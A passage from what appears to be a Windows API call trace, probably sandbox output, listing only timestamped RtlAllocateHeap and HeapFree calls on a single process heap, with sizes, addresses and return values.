dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0035.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0035.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0035.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b48 | out: hHeap=0xe0000) returned 1 [0035.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0035.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0035.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x1097d0 [0035.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b90 [0035.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0035.914] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0035.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105290 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c08 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105290 | out: hHeap=0xe0000) returned 1 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105f10 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103c08 | out: hHeap=0xe0000) returned 1 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1078c0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107950 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106f30 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1079e0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107c20 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107560 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.227] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109488 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x109028 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103cf8 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105330 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b18 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105330 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x106540 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b18 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.230] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | 